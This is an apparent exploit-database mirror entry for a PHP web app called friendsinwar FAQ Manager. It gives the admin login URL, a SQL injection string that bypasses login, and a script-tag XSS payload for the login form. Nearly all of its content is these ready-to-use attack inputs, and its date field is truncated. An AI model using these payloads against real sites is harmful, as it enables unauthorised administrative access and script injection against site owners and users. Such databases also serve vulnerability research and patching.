exploit-db-mirror/exploits/php/webapps/22710.txt
Offensive Security d63de06c7a DB: 2022-11-10
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

38 lines
No EOL
709 B
Text

# Exploit Title: friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/the_faq_manager/
# Tested on: Windows 7
# Blog: d3b4g.me
----------------------------------------------------------------------------------
() SQL Injection :
http://localhost/path/the_faq_manager/admin/login.php
+ Use following information to bypass login.
User:admin
' or ' 1=1
() Cross Site Scripting:
XSS in loging form, insert follwing JS code to loging follwing.
'"()&%1<ScRiPt >prompt(952226)</ScRiPt>
-end-